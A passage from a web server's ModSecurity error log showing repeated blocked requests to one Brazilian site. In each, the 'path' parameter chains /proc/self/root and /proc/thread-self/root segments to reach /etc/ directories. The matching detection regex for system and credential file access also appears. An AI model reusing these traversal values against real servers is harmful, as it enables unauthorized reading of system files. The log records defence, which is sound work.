[Wed Mar 18 06:59:50.647464 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:57010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3lta6ubjKNq_cu4Zs0AAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:59:51.943965 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:51568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3l-yqAr6etmhZHNqSeAAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:00:35.570968 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.241.31:35508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3wwkwaGbbGflqUZDoNgAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:00:46.476006 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.243.128:51574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3zSmAPhZkrhU8w4lFFAAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:00:49.159578 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:52336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp30EzinOy1jxa1j4fpzwAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:00:50.847434 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:34690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp30uyqAr6etmhZHNqSpgAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:00:52.110925 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:34706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp31Mdf6f5d65gmYZSpnQAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:00:53.545504 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:34708] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp31UzinOy1jxa1j4fp1QAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:00:55.990105 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:34714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp31-yqAr6etmhZHNqSqAAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:00:58.155175 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:37422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp32uoXxyEfFpUF8f9DtQAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:00:59.442528 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:34720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp328df6f5d65gmYZSpogAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:01:00.741381 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:53042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp33OyqAr6etmhZHNqSqwAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:01:02.331172 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:53046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp33vu8EFLIOrSqIpvbywAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:01:03.632019 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:53056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp339a6ubjKNq_cu4ZtBAAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:01:05.226975 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:50594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp34eyqAr6etmhZHNqSsgAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:01:12.536247 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:53070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp36OyqAr6etmhZHNqSvgAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:01:15.101201 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:39828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp36-yqAr6etmhZHNqSxQAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:01:17.463049 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:39844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp37cdf6f5d65gmYZSppAAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:01:32.457202 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.243.128:39860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3_EzinOy1jxa1j4fp5gAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:01:34.927179 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:48002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3_gkwaGbbGflqUZDoUQAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:01:36.303527 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:48010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp4AMdf6f5d65gmYZSptQAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:01:39.999986 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:48018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp4AtY0UrI5A3LftIxwoQAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:01:45.711775 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:42740] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp4CUzinOy1jxa1j4fp7QAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:01:48.037632 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:42746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 